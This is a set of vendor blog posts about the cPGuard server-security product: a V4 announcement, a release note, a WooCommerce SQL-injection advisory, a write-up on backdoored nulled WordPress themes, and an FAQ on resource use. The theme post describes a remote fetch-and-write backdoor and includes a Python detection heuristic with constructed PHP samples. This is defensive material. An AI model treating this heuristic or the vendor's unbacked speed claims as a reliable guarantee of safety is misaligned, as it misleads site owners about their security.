Some points that you need to notice about cPGuard V4

We are happy to announce that we expect to start cPGuard v4 client beta testing by the first week of April 2022. Version 4 of cPGuard is not just a typical update with some UI improvements and new features. It is a complete revamp which introduces a fresh UI with an incredible new workflow. We have built a new framework that opens endless possibilities for integrations on multiple platforms. We are trying our best to make each component perfect and to ensure a trouble-free upgrade from V3 to V4. As it is a new software model, there are a few things you need to notice about V4 features and requirements.

What are the new features in V4?

  • Centralized server management: In cPGuard V4, you have an option to view and manage all your servers from our Cloud-based user interface. This will make your life easier, especially when you need to check cPGuard on multiple servers.
  • User-based access: You can define an access matrix for your server managers to your servers without giving them root access. You can create multiple users and grant access flexibly on your servers.
  • Server overview reports: From the centralized UI, you will get an overview of the attack rate against your servers, servers with alerts, etc.
  • Control panel independent: We are crafting cPGuard V4 to be control panel independent, so we can support more control panels soon and introduce more features into cPGuard.

Requirements for cPGuard V4

As it is a new software model, the requirements to run cPGuard also change a bit compared to previous versions.

  • The App Cloud must be able to communicate with the agent installed on the customer's servers. So the cPGuard Cloud IPs must be whitelisted on client servers or the software will not function well. We will add an automatic whitelist for CSF, and in other cases the user must manually whitelist the IPs that we provide.
  • The supported Operating System list is updated and we support almost all RHEL and Debian derivatives now. But cPGuard version 4 will not support CentOS 6.x and Debian 9.
  • The UI will be centralized, so you need to log in to the cPGuard dashboard separately using your OPSSHIELD client area login credentials.
  • You may notice some missing data in the V4 dashboard initially, which is fine because those are the new metrics for V4. We try to import all V3 data to V4 during the upgrade, but new metrics need to be populated from the new data collecting system.

Do you need to take any action now?

You do not need to take any action now. We will roll the existing servers into V4 sequentially with multiple updates. During the process, we will alert customers if any of the requirements cannot be met, and you can resolve it manually to prepare your servers for the V4 update. We hope that we can release V4 within a couple of weeks.

Stay tuned to our social media accounts to get additional information about cPGuard V4.

Release note for cPGuard version 3.69

We released cPGuard version 3.69 on January 26, 2022 and the update is available on all servers automatically. We encourage our customers to make sure that they always use the latest version, as we follow sequential updates and every update is applicable to the latest versions of the software.

What is up with version 3.69?

We release regular updates to our software, scanner rules, WAF rules, etc. to make sure that everything is up to date to detect the latest threats. For a person who follows the release notes of cPGuard, the new version may not feel like anything exciting!

But it took almost 2 months to complete this build, as it has a completely revamped scanner engine code. Our developers have rewritten the whole code from scratch to make it more efficient and organized. As a project which has been running for over 4 years and started as a specific control panel plugin, we believe this is the right time to start working on the project revamp to enter into new areas.

The major changes

Our team is working on some cPGuard enhancements and internally calls it cPGuard V4. So version 3.69 is the first step towards the V4 release, and we will soon release the following updates in the upcoming versions. In 3.69, the major changes include:

  • Revamped scanner engine code
  • Eliminated the dependency with system ClamAV
  • Enhanced file checks and improved scanner speed
  • etc

What is next?

As I mentioned above, 3.69 is just the first step towards a milestone. Our team is working hard to increase cPGuard productivity and reduce the admin overhead. We will have some major updates this year and we believe that they can help our customers manage cPGuard and their servers easily.

SQL Injection Vulnerability Discovered in WooCommerce – Generic SQL Injection Attacks

On 15th July 2021, a critical SQL-injection security vulnerability in the WooCommerce e-commerce platform and a related plugin was reported which might affect millions of websites around the world. The vulnerabilities were detected on the 13th of July and fixed in WooCommerce versions 3.3.6 to 5.5.1 and WooCommerce Blocks versions 2.5.16 to 5.5.1. Though they pushed a forced automatic update to all affected websites, it is recommended to manually check your website and make sure that everything is up to date.

What is the exploit impact? As per the announcement from WooCommerce, this vulnerability allows an unauthenticated attacker to access arbitrary data in an online store's database. If a store was affected, the exposed information will be specific to what that site is storing but could include order, customer, and administrative information.

So what is an SQL injection attack and how do you prevent it? SQL injection is a web security vulnerability that allows an attacker to interfere with the SQL queries that an application makes to its database. This type of vulnerability allows a malicious hacker to affect the database in a way that makes it display information or behave in ways it is not supposed to. This is a common attack vector and can mostly be detected using website auditing tools. The developer of every application must properly validate and filter user input received through any form or from the URI.

Can cPGuard protect your website from such vulnerabilities? Yes, the cPGuard WAF, powered by the Malware.Expert ModSec rule set, can protect your websites from such generic attacks, including SQL injection. So cPGuard can already defend against such attacks and protect your websites. It also works along with the IPDB Distributed Firewall module, which can detect and block repeatedly attacking IPs on all our customer servers.

Malware in nulled WordPress themes…The story continues…

The subject is pretty familiar to most WordPress developers and people who maintain websites. Everyone who takes their website security seriously will honor the advice, but there are still some people who wish to take short-cuts and install nulled themes and plugins. Such people are not saving money to add more modules to their website; rather, they are opening a remote website management option to the hacker.

We have published some articles before about such websites, which you should not rely on to download plugins or themes. Today I am going to talk about another such website, which is “freewordpresthemes [dot] com”. They are offering a few WordPress themes which you can download free from their website, and they are packed with malware inside. We found them during our regular inspection of the malware reported by our scanner engine. So the cPGuard scanner engine already protects you from the particular malware injected into their package.

So now let us take a look at the actual injection in their package. We found the below injected code in their “functions.php” file, which actually refers to a TXT file on their website.

The injected code pulls some code from their website, creates a new file under the public space of the website, and adds some code to it which is the remote hand for the hackers.

So what does that mean? Yes, installing and enabling this theme means you have opened up your website to an anonymous person who can make changes to your website without permission.
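A heuristic check for the pattern described above, as an added example rather than cPGuard's scanner or the code from the theme: it flags PHP files that combine a URL literal, a remote-fetch call and a file write. The function names, the sample files and the `example.invalid` URLs are constructed for illustration.

```python
import re
from pathlib import Path

URL = re.compile(r"""https?://[^\s'"<>)]+""", re.I)
FETCH = re.compile(r"\b(file_get_contents|curl_exec|wp_remote_get|fopen)\s*\(", re.I)
WRITE = re.compile(r"\b(file_put_contents|fwrite|fputs)\s*\(", re.I)

def scan_php(source):
    """Flag PHP source that holds a URL literal, a fetch call and a file write."""
    hits = {"url": [], "fetch": [], "write": []}
    for no, line in enumerate(source.splitlines(), 1):
        code = line.strip()
        if code.startswith(("//", "#", "*", "/*")):
            continue  # comment lines (theme headers carry harmless URLs)
        hits["url"] += [(no, m.group(0)) for m in URL.finditer(code)]
        if FETCH.search(code):
            hits["fetch"].append(no)
        if WRITE.search(code):
            hits["write"].append(no)
    # Only the combination of all three is reported, to limit false positives.
    return all(hits.values()), hits

def scan_theme(root):
    """Return {relative path: hits} for every suspicious .php file under root."""
    root, found = Path(root), {}
    for path in sorted(root.rglob("*.php")):
        bad, hits = scan_php(path.read_text(errors="replace"))
        if bad:
            found[str(path.relative_to(root))] = hits
    return found

# Constructed samples (not the code from the theme the post describes).
INFECTED = """<?php
/* Theme URI: https://example.invalid/theme */
function theme_setup() { add_theme_support('title-tag'); }
$src = 'http://example.invalid/placeholder.txt';
$body = file_get_contents($src);
file_put_contents(__DIR__ . '/placeholder.php', $body);
"""
CLEAN = """<?php
// Docs: https://example.invalid/docs
function theme_setup() { add_theme_support('title-tag'); }
add_action('after_setup_theme', 'theme_setup');
"""

if __name__ == "__main__":
    print(scan_php(INFECTED))
    print(scan_php(CLEAN))
```

Run `scan_theme()` on an unpacked theme archive before installing it; a hit is a reason to read the flagged lines by hand, not a verdict, since legitimate themes can also fetch and cache remote data.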

So how can you escape from such threats? There is only one answer to that: download themes and plugins from reliable sources. You should be ready to pay for the software that is going to serve your requirements, or you should find some alternate options instead of opting for such short-cuts. Even though there are numerous incidents and reports out there regarding such issues, people who do not act wisely will end up in such trouble.

You can also deploy security solutions like cPGuard on your server to protect you from such threats. But ultimately it is not recommended to use any nulled software if security matters!

Do we really need resource consumption settings for cPGuard?

What do you mean by resource consumption?

Every piece of software needs some resources to run on a system and perform its operations. The amount of resources each program needs is different and depends on the task it performs. Software that needs to run multiple algorithms, do complex computations and perform a lot of file and network operations is usually highly resource-intensive (specifically CPU, RAM and disk I/O). An anti-virus scanner comes under this category, as there are a large number of file reads and writes, content analysis, pattern recognition and comparisons to be performed.

In a server environment, resources are limited and are required to be available on demand for the server's primary task. Therefore antivirus scanners have settings to adjust the resources they can consume or to schedule the scanner to run in off-peak hours.

So why does cPGuard not allow users to limit it?

We have strictly maintained a “performance-oriented” approach while building cPGuard and wanted it to run smoothly on the smallest of servers. The cPGuard scanner engine core is built to work fast and consume minimal resources. Some of the major points that help us achieve better performance with lower resources are:

  • We scan only relevant files/locations, unlike the competitors where they scan a lot of unnecessary locations and waste server resources.
  • Our core scanner is single-threaded and will not cause a total server spike. So CPU limiting is not required for our scanner daemon.
  • Our highly efficient and optimised algorithms leave only a very small memory footprint.
  • Our IPDB rules contain only active attack sources and thus load only minimal rules and reduce network overhead.
  • WAF contains only minimal but generic rules which effectively block most and major web attacks.

Do you have any proof?

Yes, we have, and we can confidently stand by our statement. The biggest proof is that in the last 4 years the complaints due to resource usage are close to ZERO. The component of most such systems that can cause a load spike on the server is the scanner module. Our scanner is fine-tuned to avoid such a scenario and it is one of the fastest scanners available in the market. It is tested and confirmed that the cPGuard scanner engine is more than 7x faster than that of our competitors. The screenshot below shows the manual scan option in cPGuard, where it completed scanning 41K+ files in just 7 mins.

So is there any advantage with Resource Consumption settings?

Yes, there is, if the scanner module is resource hungry. It will help to reduce server load, but it will drastically slow down the scanning process and will engage resources for a longer time. As I stated earlier, that is not a problem with cPGuard, and you do not need to worry about setting up such values and monitoring our services.

Ok, I have a few more questions…

We are happy to address them…feel free to reach our support team and we will be more than happy to answer your questions!